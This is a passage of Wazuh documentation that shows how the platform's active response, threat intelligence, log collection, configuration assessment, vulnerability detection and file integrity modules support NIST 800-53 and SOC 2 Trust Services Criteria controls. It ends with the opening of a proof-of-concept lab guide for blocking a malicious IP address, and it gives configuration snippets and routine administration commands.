  • AC-7 Unsuccessful logon attempts: “The need to limit unsuccessful logon attempts and take subsequent action when the maximum number of attempts is exceeded applies regardless of whether the logon occurs via a local or network connection. Due to the potential for denial of service, automatic lockouts initiated by systems are usually temporary and automatically released after a predetermined, organization-defined time period. If a delay algorithm is selected, organizations may employ different algorithms for different components of the system based on the capabilities of those components. Responses to unsuccessful logon attempts may be implemented at the operating system and the application levels. Organization-defined actions that may be taken when the number of allowed consecutive invalid logon attempts is exceeded include prompting the user to answer a secret question in addition to the username and password, invoking a lockdown mode with limited user capabilities (instead of full lockout), allowing users to only logon from specified Internet Protocol (IP) addresses, requiring a CAPTCHA to prevent automated attacks, or applying user profiles such as location, time of day, IP address, device, or Media Access Control (MAC) address. If automatic system lockout or execution of a delay algorithm is not implemented in support of the availability objective, organizations consider a combination of other actions to help prevent brute force attacks. In addition to the above, organizations can prompt users to respond to a secret question before the number of allowed unsuccessful logon attempts is exceeded. Automatically unlocking an account after a specified period of time is generally not permitted. However, exceptions may be required based on operational mission or need.”

  • SC-5 Denial-of-service protection: “Denial-of-service events may occur due to a variety of internal and external causes, such as an attack by an adversary or a lack of planning to support organizational needs with respect to capacity and bandwidth. Such attacks can occur across a wide range of network protocols (e.g., IPv4, IPv6). A variety of technologies are available to limit or eliminate the origination and effects of denial-of-service events. For example, boundary protection devices can filter certain types of packets to protect system components on internal networks from being directly affected by or the source of denial-of-service attacks. Employing increased network capacity and bandwidth combined with service redundancy also reduces the susceptibility to denial-of-service events.”

The Wazuh Active Response module assists in meeting the above controls by responding to brute force and denial-of-service attacks. Wazuh includes out-of-the-box active response commands that drop traffic from a malicious IP address or disable a user account that is the target of a brute-force attack, as sketched below.
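
One such configuration pairs the out-of-the-box firewall-drop command with rule ID 5763 (sshd brute force attempts). The block below goes in the <ossec-config> section of the Wazuh server configuration; the 180-second timeout is an arbitrary example value, so adapt it to your policy:

    <active-response>
      <disabled>no</disabled>
      <command>firewall-drop</command>
      <location>local</location>
      <rules_id>5763</rules_id>
      <timeout>180</timeout>
    </active-response>

With this configuration, the offending source IP address is dropped on the endpoint that reported the brute force alerts and released again when the timeout expires.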

Use case: Automatically disable an account

This use case shows how Wazuh helps meet the NIST AC-7 Unsuccessful logon attempts requirement by identifying failed login attempts and responding to them automatically.

In this scenario, the Wazuh Active Response module automatically disables a user account on a monitored Ubuntu 22.04 endpoint when event analysis detects multiple failed terminal login attempts. You can then track the alerts for these events and actions on the Wazuh dashboard.

Wazuh server
  1. Add the following configuration to the <ossec-config> block of the Wazuh server configuration file /var/ossec/etc/ossec.conf:

    <ossec-config>
      <active-response>
        <disabled>no</disabled>
        <command>disable-account</command>
        <location>local</location>
        <rules_id>5503</rules_id>
      </active-response>
    </ossec-config>
    
    • command: The active response script for the disable-account command disables a user account when triggered.

    • location: This specifies where to execute the active response command. The local option executes the script on the monitored endpoint where the event occurred.

    • rules_id: This active response script runs when an alert for rule ID 5503 is generated. Rule ID 5503 detects multiple failed terminal login attempts and generates alerts. You can define multiple rules by separating them with a comma.

  2. Restart the Wazuh server to apply the configuration changes:

    # systemctl restart wazuh-manager
    
Ubuntu endpoint
  1. Create two users for this use case:

    # useradd <USER1>
    # useradd <USER2>
    

    In our use case, <USER1> is kon, while <USER2> is jon.

  2. Attempt to log in to the <USER2> account with the wrong credentials, using the <USER1> account:

    <USER1>:$ su <USER2>
    

    The image below shows the related alerts on the Wazuh dashboard:

    Alerts on the Wazuh dashboard
    Users 1 and 2 alerts
  3. Check that the account was successfully locked using the passwd command on the Ubuntu endpoint:

    # passwd --status <USER2>
    
    jon L 11/24/2022 0 99999 7 -1
    

The L flag indicates the account is locked.
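
If you need to restore access after investigating the incident, you can unlock the account manually on the endpoint, for example:

    # passwd -u <USER2>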

Threat intelligence

The Wazuh MITRE ATT&CK module provides you with threat intelligence capability. You can use it to gain further context on alerts in your environment. MITRE ATT&CK is a repository for information about attack tactics and techniques, and what to do to detect and mitigate them. The Wazuh MITRE ATT&CK module shows alerts that detail the threat actors, attack tactics, and techniques used in a security event. This module is helpful when an attack generates alerts and a user wants to know more about it. Refer to the MITRE ATT&CK framework for more details about MITRE mapping to rules.

The Wazuh threat intelligence capability helps to meet the following NIST 800-53 controls:

  • RA-10 Threat hunting: “Threat hunting is an active means of cyber defense in contrast to traditional protection measures, such as firewalls, intrusion detection and prevention systems, quarantining malicious code in sandboxes, and Security Information and Event Management technologies and systems. Cyber threat hunting involves proactively searching organizational systems, networks, and infrastructure for advanced threats. The objective is to track and disrupt cyber adversaries as early as possible in the attack sequence and to measurably improve the speed and accuracy of organizational responses. Indications of compromise include unusual network traffic, unusual file changes, and the presence of malicious code. Threat hunting teams leverage existing threat intelligence and may create new threat intelligence, which is shared with peer organizations, Information Sharing and Analysis Organizations (ISAO), Information Sharing and Analysis Centers (ISAC), and relevant government departments and agencies.”

  • PM-16 Threat awareness program: “Because of the constantly changing and increasing sophistication of adversaries, especially the advanced persistent threat (APT), it may be more likely that adversaries can successfully breach or compromise organizational systems. One of the best techniques to address this concern is for organizations to share threat information, including threat events (i.e., tactics, techniques, and procedures) that organizations have experienced, mitigations that organizations have found are effective against certain types of threats, and threat intelligence (i.e., indications and warnings about threats). Threat information sharing may be bilateral or multilateral. Bilateral threat sharing includes government-to-commercial and government-to-government cooperatives. Multilateral threat sharing includes organizations taking part in threat-sharing consortia. Threat information may require special agreements and protection, or it may be freely shared.”

The NIST 800-53 controls above require organizations to perform threat hunting and stay continuously updated about cyber threats and adversaries. Wazuh helps you meet these controls by mapping alerts to MITRE ATT&CK techniques and providing an intelligence dashboard for reviewing adversary tactics, techniques, software, and mitigations.

Use cases
Review MITRE ATT&CK techniques in your environment

In this use case, Wazuh helps meet the PM-16 Threat awareness program requirement by providing the MITRE ATT&CK module for threat information sharing. Review various MITRE ATT&CK techniques and see the events associated with those techniques in your environment. To perform this review, follow the steps below:

  1. Select the MITRE ATT&CK module on the Wazuh dashboard.

    MITRE ATT&CK module
  2. Select Framework. Here, you can see the available MITRE tactics and their associated techniques.

  3. Select any technique to display its details as well as the events in your environment associated with that technique. In this example, we choose T1112 Modify Registry.

    Select Framework
    T1112 Modify Registry

You can proceed to review the events for possible malicious activity.

Review intelligence on threat actors

In this use case, Wazuh helps meet the RA-10 Threat hunting requirement by providing a threat intelligence platform for threat hunters.

In this scenario, you review intelligence from MITRE about various threat actors, techniques, mitigations, and tools. Wazuh provides this information in the Intelligence section of the MITRE ATT&CK module. This review helps support the NIST PM-16 Threat awareness program control and keeps security administrators informed about threats. Follow the steps below to perform this review:

  1. Select the MITRE ATT&CK module from the Wazuh dashboard.

    MITRE ATT&CK module
  2. Select Intelligence. Here, you can see the available MITRE intelligence sections.

  3. Select Groups. Here, you can see the different threat groups identified by MITRE. In this use case, choose G0018.

    Select Groups

    You can see the group description, the software they use, and their associated techniques.

    Group description
    Associated techniques

Using Wazuh for TSC compliance

The American Institute of Certified Public Accountants (AICPA) developed the SOC 2 reporting framework to provide organizations with a uniform method to assess and report on the efficacy of their information security policies. SOC 2 reports focus on the five trust service categories of security, availability, processing integrity, confidentiality, and privacy.

The Trust Services Criteria (TSC) created by the Assurance Services Executive Committee (ASEC) of the AICPA presents control evaluation benchmarks. These evaluation benchmarks include metrics for security, availability, processing integrity, confidentiality, and privacy of information and systems across an entire entity. These metrics also relate to granular aspects of the entity, such as a division, an operational procedure, or a particular type of information used by the entity. The AICPA defines the common criteria as a set of controls that apply to the five Trust Services Criteria categories.

  • The COSO Principles and Common Criteria

    The Committee of Sponsoring Organizations (COSO) internal control framework provides a systematic approach for organizations to manage risk and improve performance. It includes a detailed framework for evaluating and improving an entity's internal control structure.

    TSC common criteria (CC) provides a framework for assessing and certifying the security of information technology (IT) products and systems. It defines a set of security standards and evaluation guidelines that organizations can adopt to assess the security of IT products and systems.

    It’s important to note that though both frameworks intersect, they are different. The TSC framework and COSO principles both evaluate the effectiveness of an organization's internal controls and risk management processes. While the COSO principles prioritize the entity's overall internal control and risk management, the TSC common criteria focus primarily on the security of IT products and systems, providing a set of specific criteria for evaluating controls related to security, availability, processing integrity, confidentiality, and privacy.

    Providing security to IT products and systems is a key element in improving an entity's overall risk management strategy and internal control structure. These criteria focus on the logical and physical protection of information, systems, and networks. The common criteria (CC) are organized into nine subsections, which are:

    • CC1: Control environment

    • CC2: Communication and Information

    • CC3: Risk Management and Design and Implementation of Controls

    • CC4: Control Activities

    • CC5: Monitoring of Controls

    • CC6: Logical and Physical Access Controls

    • CC7: System Operations

    • CC8: Change Management

    • CC9: Risk Mitigation

    In summary, SOC 2, TSC, COSO, and CC are all frameworks and standards organizations use to manage risks and ensure the effectiveness of their internal controls. SOC 2 and TSC focus on the security, availability, processing integrity, confidentiality, and privacy of an organization's systems and services. COSO provides a broader framework for enterprise risk management and internal control, while CC offers a method for evaluating the security features of IT products and systems. Organizations may use a combination of these frameworks and standards to develop a comprehensive risk management and compliance strategy.

  • TSC additional criteria

    The TSC additional criteria are an extension of the common criteria. Organizations can use these additional criteria to address precise security requirements not defined by the conventional TSC common criteria.

Wazuh assists with these criteria by performing log collection, file integrity monitoring, configuration assessment, threat detection, vulnerability assessment, and automated threat response.

This document outlines use cases that show how Wazuh helps users comply with the TSC common criteria, and the additional criteria for availability, confidentiality, and processing integrity. We have also created the Using Wazuh for TSC 2017 requirements guide, which complements this document. Please refer to the guide for more details on how Wazuh helps meet TSC requirements.

The following sections outline some of the technical requirements that Wazuh supports:

Common criteria 2.1 (COSO Principle 13)

The TSC common criteria (CC2.1) relate to using relevant information and communication within an organization. It states, “The organization obtains or generates and uses relevant, quality information to support the functioning of internal control”.

This principle emphasizes the importance of accurate and prompt information to manage risks and achieve organizational objectives effectively. It also highlights the need for an efficient communication channel so that information can be conveyed and utilized by the appropriate individuals and departments within the organization. There are four objectives needed to meet this requirement:

  • Identify information requirements: A process is in place to identify the information required and expected to support the functioning of the other components of internal control and the achievement of the entity’s objectives.

  • Capture internal and external sources of data: Information systems capture internal and external sources of data.

  • Process relevant data into information: Information systems process and transform relevant data into information.

  • Maintain quality throughout processing: Information systems produce information that is timely, current, accurate, complete, accessible, protected, verifiable, and retained. Information is reviewed to assess its relevance in supporting the internal control components.

To comply with Principle 13, an entity should have processes in place to identify and gather relevant information, assess the quality of that information, and use it to support proper decision-making, such as internal control activities. It should also establish a functional communication channel to ensure timely information distribution to the appropriate individuals and departments.

The use case below shows how Wazuh assists in meeting this requirement.

Use case: Collecting and analyzing logs across multiple endpoints

Wazuh helps meet the COSO Principle 13 (CC2.1) requirement by providing capabilities that generate quality information for the proper functioning of internal control measures. An example is log data analysis. The Wazuh logcollector module retrieves and centralizes log data from different sources, such as operating systems, applications, network devices, and security appliances. Once the log data is collected, Wazuh applies various analysis techniques to extract valuable insights and detect potential security issues. This is done by matching the received data with the Wazuh out-of-the-box decoders and rules.
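
As an illustrative example of how a log source is declared, the <localfile> sketch below collects the authentication log on a Debian-based endpoint; the path is an assumption, and you would add one block per log file relevant to your environment:

    <localfile>
      <log_format>syslog</log_format>
      <location>/var/log/auth.log</location>
    </localfile>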

This use case shows how log data analysis can be used to detect specific events across multiple endpoints. The process below shows how the Wazuh Threat Hunting module groups and displays these events for an Ubuntu 22.04 agent.

  1. Click on Threat Hunting in the Wazuh dashboard:

Wazuh dashboard

Check the security events on the dashboard and click on any alert to view more details.

Threat hunting dashboard

The Wazuh ruleset also gives proper labeling to these triggered events. An example is the image below that shows the details for the triggered alert Attached USB Storage with rule ID 81101.

Attached USB storage alert details

Common criteria 3.1 (COSO Principle 6)

The TSC common criteria CC3.1 states, “The entity specifies objectives with sufficient clarity to enable the identification and assessment of risks relating to objectives”. This means that the entity should monitor the effectiveness of internal controls over financial reporting on an ongoing basis. In other words, an entity should have a system in place to regularly assess the effectiveness of its internal controls, identify and address any deficiencies, and make necessary adjustments to ensure that the controls effectively achieve their intended objectives.

This principle is a major component of the COSO framework for internal control and is essential for ensuring the integrity of financial reporting within an entity.

The use case below shows how Wazuh assists in meeting this requirement.

Use case: Utilizing Wazuh detection and response capabilities for security monitoring

Wazuh includes several out-of-the-box modules that help meet the COSO Principle 6 CC3.1 requirement. These modules provide capabilities for vulnerability assessment, configuration assessment, threat intelligence, and regulatory compliance, to mention a few. The analysis from these modules can be viewed from the Wazuh dashboard for easy identification and risk assessment.

Using the Wazuh dashboard, you can review events and alerts generated across your environment.

Events and alerts review

Common criteria 5.1 (COSO Principle 10)

The TSC common criteria CC5.1 states, “The entity selects and develops control activities that contribute to the mitigation of risks to the achievement of objectives to acceptable levels.” This means that the organization should design and implement controls appropriate for its specific business environment and aligned with its overall goals and objectives. Examples of control activities include policies, authorization and approval processes, information management, and physical controls.

One of the points of focus for this criterion is that an effective control framework should include a diverse mix of control activities, considering different approaches to address risks and incorporating a combination of manual and automated, preventive and detective controls.

This principle is a crucial part of the overall control metrics of an organization and is frequently applied in the context of internal control and risk management. It aids organizations in detecting and reducing risks and ensuring compliance with laws and regulations.

The use case below shows how Wazuh assists in meeting this requirement.

Use case: Security Configuration Assessment of a monitored endpoint

Wazuh helps meet this aspect of the COSO Principle 10 CC5.1 control activities requirement by providing several modules. One of these modules is the Security Configuration Assessment (SCA) module. This module allows a user to scan system components and configurations to detect misconfigurations that could lead to security issues. The Wazuh SCA module is an example of a detective control for proactively identifying misconfiguration issues for timely remediation.

In this case, we use the SCA module to evaluate a monitored Windows 10 endpoint against the CIS Benchmark for Windows 10. By monitoring and detecting security configuration issues, you can quickly identify and remediate potential security risks, ensuring the security and compliance of your systems. You can track these events and actions on the Wazuh dashboard:

  1. Navigate to the Configuration Assessment module from the Wazuh dashboard. Select the monitored Windows 10 endpoint.

You can see the result of the assessment of the monitored endpoint.

Password assurance checks

Common criteria 6.1

The TSC common criteria CC6.1 states that: “The entity implements logical access security software, infrastructure, and architectures over protected information assets to protect them from security events to meet the entity's objectives”. This control is part of the security category of the TSC requirements. It requires the entity to maintain an inventory of its information assets. It also seeks to define the minimum requirements for the management of logical and physical access to the entity's information systems. These controls are implemented with user authentication, encryption, and asset inventory.

The TSC CC6.1 is a key consideration when assessing the reliability of a system. It demonstrates that the required security precautions have been taken to maintain an entity's security.

The use case below shows how Wazuh assists in meeting this requirement.

Use case: Maintaining asset inventory on a Windows endpoint

Wazuh meets the architecture, infrastructure, and security software aspects of the common criteria CC6.1 by providing several modules. One of these is the Syscollector module. In this use case, we show how to use the Wazuh Syscollector module to collect system information on a Windows 11 endpoint. You can use this module to monitor specific components, protocols, services, or applications running on an endpoint.

  1. Open the Wazuh agent configuration file C:\Program Files (x86)\ossec-agent\ossec.conf and scroll to the syscollector block to verify that you have the same configuration below:

    <!-- System inventory -->
       <wodle name="syscollector">
         <disabled>no</disabled>
         <interval>1h</interval>
         <scan_on_start>yes</scan_on_start>
         <hardware>yes</hardware>
         <os>yes</os>
         <network>yes</network>
         <packages>yes</packages>
         <ports all="no">yes</ports>
         <processes>yes</processes>
         <users>yes</users>
         <groups>yes</groups>
         <services>yes</services>
         <browser_extensions>yes</browser_extensions>
    
         <!-- Database synchronization settings -->
         <synchronization>
           <max_eps>10</max_eps>
           <integrity_interval>24h</integrity_interval>
         </synchronization>
       </wodle>
    
  2. Navigate to IT Hygiene on the Wazuh dashboard and select your endpoint. You can see details about installed applications, network services, and used ports on the monitored endpoint.

    Agent inventory data

Common criteria 7.1

The TSC common criteria CC7.1 states that: “To meet its objectives, the entity uses detection and monitoring procedures to identify (1) changes to configurations that result in the introduction of new vulnerabilities, and (2) susceptibilities to newly discovered vulnerabilities”. This control indicates the depth and rigor of the evaluation required to be performed on an information asset to monitor changes to the configuration. It ensures that changes do not introduce new vulnerabilities to the system or make it prone to new vulnerabilities.

Evaluating an information asset for compliance with CC7.1 ensures that the asset is hardened to a high level of security assurance. CC7.1 facilitates the prevention of misconfiguration flaws and ensures continuous monitoring to quickly identify vulnerabilities.

The use case below shows how Wazuh assists in meeting this requirement.

Use case: Monitoring a CentOS endpoint for vulnerabilities

Wazuh helps meet the common criteria CC7.1 by providing the Vulnerability Detection module. This module can uncover vulnerabilities in operating systems and installed applications. It performs a software audit by querying our Cyber Threat Intelligence (CTI) API for vulnerability content documents. We aggregate vulnerability information into the CTI repository from external vulnerability sources indexed by Canonical, Debian, Red Hat, Arch Linux, Amazon Linux Advisories Security (ALAS), Microsoft, CISA, and the National Vulnerability Database (NVD). We also maintain the integrity of our vulnerability data and keep the vulnerability repository updated, ensuring the solution checks for the latest CVEs. The Vulnerability Detection module correlates this information with data from the endpoint application inventory.

In this use case, you can see how the Wazuh Vulnerability Detection module detects vulnerabilities on a CentOS 8 endpoint.

  1. Edit the Wazuh server configuration file /var/ossec/etc/ossec.conf. Make sure the module is enabled.

    <vulnerability-detection>
      <enabled>yes</enabled>
      <index-status>yes</index-status>
      <feed-update-interval>60m</feed-update-interval>
    </vulnerability-detection>
    
    <indexer>
      <enabled>yes</enabled>
      <hosts>
        <host>https://0.0.0.0:9200</host>
      </hosts>
      <ssl>
        <certificate_authorities>
          <ca>/etc/filebeat/certs/root-ca.pem</ca>
        </certificate_authorities>
        <certificate>/etc/filebeat/certs/filebeat.pem</certificate>
        <key>/etc/filebeat/certs/filebeat-key.pem</key>
      </ssl>
    </indexer>
    
  2. If you made changes, restart the Wazuh manager to apply them:

    # systemctl restart wazuh-manager
    
  3. Navigate to the Vulnerability Detection module from the Wazuh dashboard. Select the agent to view its discovered vulnerabilities.

    Agent vulnerabilities

Common criteria 8.1

The TSC common criteria CC8.1 provides a comprehensive and well-recognized technique for evaluating the security of IT products and systems. CC 8.1 defines a set of security requirements and evaluation procedures for IT products, such as software, hardware, and systems, that are intended to be used in a security context. The objective of CC 8.1 is to provide a standardized, objective, and repeatable evaluation process for IT products and to facilitate the development of secure IT products and systems. It states that: “The entity authorizes, designs, develops or acquires, configures, documents, tests, approves, and implements changes to infrastructure, data, software, and procedures to meet its objectives”. The end goal of the common criteria 8.1 is to provide assurance to users of IT products that the product has been independently evaluated and meets a high level of security.

The following use case shows how Wazuh can assist in meeting this objective.

Use case: Monitoring packages installed on an Ubuntu endpoint

Wazuh helps meet the TSC common criteria CC8.1 requirement by providing several modules such as SCA, vulnerability detection, and active response. This use case shows how Wazuh can be used to view installed packages on an Ubuntu 22.04 endpoint.

To carry out this use case, set up a Wazuh server and an Ubuntu 22.04 endpoint with the Wazuh agent installed and connected to the Wazuh server.

  1. Upgrade the Ubuntu endpoint to trigger the installation of packages:

    $ sudo apt upgrade
    
  2. Select Threat Hunting from your Wazuh dashboard.

  3. Ensure the Ubuntu endpoint is selected.

  4. Filter for rule ID 2902.

Rule ID 2902 filtering

Wazuh contributes to the CC8.1 requirement by maintaining an accurate and up-to-date record of the software installed on each monitored agent. This information is vital for understanding the overall system configuration, tracking licenses, and ensuring compliance. Wazuh also integrates with vulnerability assessment tools and databases to identify known vulnerabilities associated with specific software packages. By cross-referencing the package inventory with vulnerability information, Wazuh highlights potential security weaknesses. This information allows organizations to prioritize patching or mitigating vulnerable packages, reducing the risk of exploitation.
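
As a complementary check, you can retrieve the package inventory that Wazuh keeps for an agent through the Wazuh API. The sketch below assumes the API is reachable on the Wazuh server at the default port 55000, that the agent of interest has ID 001, and that <API_USER> and <API_PASSWORD> are valid API credentials:

    $ TOKEN=$(curl -s -k -u <API_USER>:<API_PASSWORD> -X POST "https://<WAZUH_SERVER_IP>:55000/security/user/authenticate?raw=true")
    $ curl -s -k -H "Authorization: Bearer $TOKEN" "https://<WAZUH_SERVER_IP>:55000/syscollector/001/packages?pretty=true&limit=5"

The response lists the packages collected by the Syscollector module, including their names and versions, which is the inventory that the correlation described above relies on.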

The additional criteria

The Trust Service Criteria include an additional set of criteria that complement the COSO principles. These criteria, defined within the introductory section of this document, outline metrics that aim to improve the entity’s internal control process and risk management. They are specific to availability, processing integrity, confidentiality, and privacy. The sections below show the application and use cases for some selected requirements.

Availability - A1.1

The TSC additional criteria for availability A1.1 states that “The entity maintains, monitors, and evaluates current processing capacity and use of system components (infrastructure, data, and software) to manage capacity demand and to enable the implementation of additional capacity to help meet its objectives”. Maintaining the availability of information systems is very important to the business activities of service organizations.

Many service organizations offer outsourced services to their clients and typically have contractual obligations or service-level agreements regarding the services provided. These agreements make it valuable to include TSC requirements regarding availability, as this provides confidence to customers and the organization. It is especially common among data centers and organizations with software as a service (SaaS) offerings, which often include TSC compliance.

The use case below demonstrates how Wazuh assists in meeting this requirement.

Use case: Using Wazuh for system resource monitoring on a Windows endpoint

Wazuh helps to meet the TSC additional criteria for availability A1.1 using a combination of several Wazuh modules. These modules monitor system resources and performance and create alerts based on custom thresholds, helping administrators react to events that impact availability. The modules include command monitoring and system inventory.

Using the Wazuh command monitoring module, we configure the Wazuh agent to run commands that monitor system resources on a Windows Server 2022 endpoint. We also show how to create custom rules that match the command output and how to view the relevant alerts on the Wazuh dashboard.

  1. Add the configuration below to the Wazuh agent configuration file C:\Program Files (x86)\ossec-agent\ossec.conf. This monitors the RAM and CPU consumption of the monitored Windows endpoint:

    <wodle name="command">
      <disabled>no</disabled>
      <tag>CPUUsage</tag>
      <command>Powershell -c "@{ winCounter = (Get-Counter '\Processor(_Total)\% Processor Time').CounterSamples[0] } | ConvertTo-Json -compress"</command>
      <interval>1m</interval>
      <ignore_output>no</ignore_output>
      <run_on_start>yes</run_on_start>
      <timeout>0</timeout>
    </wodle>
    
    <wodle name="command">
      <disabled>no</disabled>
      <tag>MEMUsage</tag>
      <command>Powershell -c "@{ winCounter = (Get-Counter '\Memory\Available MBytes').CounterSamples[0] } | ConvertTo-Json -compress"</command>
      <interval>1m</interval>
      <ignore_output>no</ignore_output>
      <run_on_start>yes</run_on_start>
      <timeout>0</timeout>
    </wodle>
    
  2. Launch PowerShell as administrator and restart the Wazuh agent for the changes to take effect:

    > Restart-Service -Name wazuh
    
  3. Create a file performance_monitor.xml in the /var/ossec/etc/rules/ directory on the Wazuh server. Add the custom rules below to trigger alerts on different performance thresholds:

    <group name="WinCounter,">
        <rule id="301000" level="0">
          <decoded_as>json</decoded_as>
          <match>^{"winCounter":</match>
          <description>Windows Performance Counter: $(winCounter.Path).</description>
        </rule>
    
        <rule id="302000" level="3">
          <if_sid>301000</if_sid>
          <field name="winCounter.Path">memory\\available mbytes</field>
          <description>Windows Counter: Available Memory.</description>
          <group>MEMUsage,tsc_A1.1,</group>
        </rule>
    
        <rule id="302001" level="5">
          <if_sid>302000</if_sid>
          <field name="winCounter.CookedValue" type="pcre2">^[5-9]\d{2}$</field>
          <description>Windows Counter: Available Memory less than 1GB.</description>
          <group>MEMUsage,tsc_A1.1,</group>
        </rule>
    
        <rule id="302002" level="7">
          <if_sid>302000</if_sid>
          <field name="winCounter.CookedValue" type="pcre2">^[1-4]\d{2}$</field>
          <description>Windows Counter: Available Memory less than 500MB.</description>
          <group>MEMUsage,tsc_A1.1,</group>
        </rule>
    
        <rule id="303000" level="3">
          <if_sid>301000</if_sid>
          <field name="winCounter.Path">processor\S+ processor time</field>
          <description>Windows Counter: CPU Usage.</description>
          <group>CPUUsage,tsc_A1.1,</group>
        </rule>
    
        <rule id="303001" level="5">
          <if_sid>303000</if_sid>
          <field name="winCounter.CookedValue">^8\d.\d+$</field>
          <description>Windows Counter: CPU Usage above 80%.</description>
          <group>CPUUsage,tsc_A1.1,</group>
        </rule>
    
        <rule id="303002" level="7">
          <if_sid>303000</if_sid>
          <field name="winCounter.CookedValue">^9\d.\d+$</field>
          <description>Windows Counter: CPU Usage above 90%.</description>
          <group>CPUUsage,tsc_A1.1,</group>
        </rule>
    </group>
    

    Where:

    • Rule ID 301000 matches all "Windows Performance Counter" events and is the parent rule for all the other rules.

    • Rule ID 302000 reports the currently available memory, measured in megabytes.

    • Rule ID 302001 triggers when the available memory is less than 1GB.

    • Rule ID 302002 triggers when the available memory is less than 500MB.

    • Rule ID 303000 reports the current CPU utilization, measured in percentage.

    • Rule ID 303001 triggers when the CPU usage is above 80%.

    • Rule ID 303002 triggers when the CPU usage is above 90%.

  4. Restart the Wazuh manager to apply the changes:

    # systemctl restart wazuh-manager
    
  5. Select TSC from the Wazuh dashboard to see the alerts. These alerts are identified with the tag A1.1.

    TSC A1.1 alerts

Processing integrity - PI1.4

The TSC additional criteria for processing integrity PI1.4 is a set of guidelines that outlines the requirements for ensuring the completeness and integrity of the data an entity processes. It states: “The entity implements policies and procedures to make available or deliver output completely, accurately, and timely in accordance with specifications to meet the entity’s objectives”. The following actions are performed to achieve this:

  • Protect output: Output is protected when stored or delivered, or both, to prevent theft, destruction, corruption, or deterioration that would prevent output from meeting specifications.

  • Distribute output only to intended parties: Output is distributed or made available only to intended parties.

  • Distribute output completely and accurately: Procedures are in place to provide for the completeness, accuracy, and timeliness of distributed output.

  • Create and maintain records of system output activities: Records of system output activities are created and maintained completely and accurately in a timely manner.

The use case below demonstrates how Wazuh assists in meeting this requirement.

Use case: Detecting file changes using the Wazuh File Integrity Monitoring module

This use case shows how Wazuh helps meet the processing integrity PI1.4 requirement by monitoring and reporting file changes using the FIM module. In this scenario, we show how you can configure the Wazuh agent on an Ubuntu 22.04 endpoint to detect changes in the critical_folder directory.

Ubuntu endpoint
  1. Switch to the root user:

    $ sudo su
    
  2. Create the directory critical_folder in the /root directory:

    # mkdir /root/critical_folder
    
  3. Create the file special_data.txt in the /root/critical_folder directory and add some content:

    # touch /root/critical_folder/special_data.txt
    # echo "The content in this file must maintain integrity" >> /root/critical_folder/special_data.txt
    
  4. Add the following configuration to the <syscheck> block of the Wazuh agent configuration file /var/ossec/etc/ossec.conf:

    <syscheck>
      <directories realtime="yes" check_all="yes" report_changes="yes">/root/critical_folder</directories>
    </syscheck>
    
  5. Restart the Wazuh agent to apply the changes:

    # systemctl restart wazuh-agent
    
  6. Modify the file by changing the content of special_data.txt from The content in this file must maintain integrity to A change has occurred:

    # echo "A change has occurred" > /root/critical_folder/special_data.txt
    # cat /root/critical_folder/special_data.txt
    
    A change has occurred
    
  7. Select TSC from the Wazuh dashboard to view the alert with rule ID 550.

    Rule id 550 alert

    The alert is tagged with PI1.4 and with other compliance requirements that intersect with this use case.

    Alert tagged PI1.4

Proof of Concept guide

In this section of the documentation, we provide a set of use cases to explore different Wazuh capabilities. We describe how Wazuh can be configured for threat prevention, detection, and response. Each use case represents a real-world scenario that users can deploy using specific configurations.

Preparing your lab environment

The Wazuh solution consists of security agents, which are deployed on monitored endpoints, and the Wazuh central components, which collect and analyze data gathered by the agents.

We recommend that you use virtual machines and take snapshots immediately after setting up the infrastructure. Doing this, you can revert to a clean environment whenever you want to test a new use case. A clean environment is important because it prevents the different tests from interfering with each other.

The diagram below illustrates the architecture of the Wazuh lab environment that is required to test the use cases described in this document.

Wazuh central components

In these use cases, the Wazuh central components (server, indexer, and dashboard) run on one system. This is because you’re monitoring a small-scale environment and there’s no need for a distributed architecture.

To install the Wazuh central components on a single system, it’s recommended to use one of the following options:

  • The Quickstart guide: Using this guide, you can install all the components on the same system in approximately 5 minutes.

  • Our preconfigured Virtual Machine: Wazuh provides a pre-built virtual machine image in Open Virtual Appliance (OVA) format. It can be imported to VirtualBox or other OVA-compatible virtualization systems.

Monitored endpoints

The Wazuh agent monitors the following endpoints. Depending on the use case, the endpoints act as victims of an attack, or as malicious actors (attackers).

Endpoint    Operating system (64-bit)       CPU cores    RAM     Disk
Ubuntu      Ubuntu 22.04 LTS                1 vCPU       2 GB    10 GB
RHEL        Red Hat Enterprise Linux 9.0    1 vCPU       2 GB    10 GB
Windows     Windows 11                      2 vCPU       4 GB    25 GB

You can see our installation guide for information on how to install the Wazuh agent on these endpoints. You need Internet access to perform some integrations and download the software used in these use cases.

Use cases

Blocking a known malicious actor

In this use case, we demonstrate how to block malicious IP addresses from accessing web resources on a web server. You set up Apache web servers on Ubuntu and Windows endpoints, and try to access them from an RHEL endpoint.

This case uses a public IP reputation database that contains the IP addresses of some malicious actors. An IP reputation database is a collection of IP addresses that have been flagged as malicious. The RHEL endpoint plays the role of the malicious actor here, therefore you add its IP address to the reputation database. Then, you configure Wazuh to block the RHEL endpoint from accessing web resources on the Apache web servers for 60 seconds. This discourages attackers from continuing their malicious activities.

In this use case, you use the Wazuh CDB list and Active Response capabilities.

Infrastructure

  • RHEL 9.0: Attacker endpoint that connects to the victim web servers. You use the Wazuh CDB list capability to flag its IP address as malicious.

  • Ubuntu 22.04: Victim endpoint running an Apache 2.4.54 web server. Here, you use the Wazuh Active Response module to automatically block connections from the attacker endpoint.

  • Windows 11: Victim endpoint running an Apache 2.4.54 web server. Here, you use the Wazuh Active Response module to automatically block connections from the attacker endpoint.

Configuration
Ubuntu endpoint

Perform the following steps to install an Apache web server and monitor its logs with the Wazuh agent.

  1. Update local packages and install the Apache web server:

    $ sudo apt update
    $ sudo apt install apache2
    
  2. If the firewall is enabled, modify the firewall to allow external access to web ports. Skip this step if the firewall is disabled:

    $ sudo ufw status
    $ sudo ufw app list
    $ sudo ufw allow 'Apache'
    
  3. Check the status of the Apache service to verify that the web server is running:

    $ sudo systemctl status apache2
    
  4. Use the curl command or open http://<UBUNTU_IP> in a browser to view the Apache landing page and verify the installation:

    $ curl http://<UBUNTU_IP>
    
  5. Add the following to /var/ossec/etc/ossec.conf file to configure the Wazuh agent and monitor the Apache access logs:

    <localfile>
      <log_format>syslog</log_format>
      <location>/var/log/apache2/access.log</location>
    </localfile>
    
  6. Restart the Wazuh agent to apply the changes:

    $ sudo systemctl restart wazuh-agent
    
Windows endpoint
Install the Apache web server

Perform the following steps to install and configure an Apache web server.

  1. Install the latest Visual C++ Redistributable package.

  2. Download the Apache web server Win64 ZIP installation file. This is an already compiled binary for Windows operating systems.

  3. Unzip the contents of the Apache web server zip file and copy the extracted Apache24 folder to the C: directory.

